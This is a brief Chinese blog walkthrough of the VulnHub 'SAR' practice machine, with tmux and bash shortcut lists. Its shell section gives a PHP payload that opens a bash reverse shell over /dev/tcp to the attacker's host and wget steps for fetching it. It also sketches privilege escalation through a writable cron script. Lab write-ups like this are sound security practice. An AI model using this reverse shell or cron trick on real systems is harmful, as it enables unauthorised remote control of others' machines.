SAR 打靶

OneZ3r0 Lv3
  2025-06-29 16:23:13 2025-06-29 16:23:13 创建   2025-07-29 18:03:58 2025-07-29 18:03:58 更新    

前言

自动任务提权

补充

补一波tmux使用

1
2
3
4
5
6
7
8
9
10
11
12
13
ctrl+B
? manual
% horizontally split
' vertically split
alt+direction move
z zoom
d detach
& kill

tmux ls
tmux attach -t
tmux kill-session -t
tmux kill server

补一波bash使用

1
2
3
4
5
6
7
8
9
10
11
ctrl+u 删除至行首
ctrl+k 删除至行末
ctrl+w 删除前面一个word
ctrl+d 删除后面一个单词
ctrl+a 行首
ctrl+e 行尾
alt+b backforward # 可用ctrl+左右替代
alt+f forward
alt+c 当前字母大写,之后字符小写
alt+u upper
alt+l lower

弹shell

这次不知道哪出问题了,shell死都弹不回来

1
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.199.128/1234 0>&1'"); ?>

如果用php起的服务,那么就得用

1
2
3
4
5
wget http://ip:port/shell.txt -O shell.php
# 因为php起的服务会解析php

# 如果用python -m http.server就没问题
wget http://ip:port/shell.php

提权

1
2
3
4
5
# 没有sudo
cat /etc/crontab

cat write.sh
# 写弹shell定时任务
  • 标题: SAR 打靶
  • 作者: OneZ3r0
  • 创建于 : 2025-06-29 16:23:13
  • 更新于 : 2025-07-29 18:03:58
  • 链接: https://blog.onez3r0.top/2025/06/29/vulnhub-sar-walkthrough/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
目录
SAR 打靶
  1. 前言
  2. 补充
  3. 弹shell
  4. 提权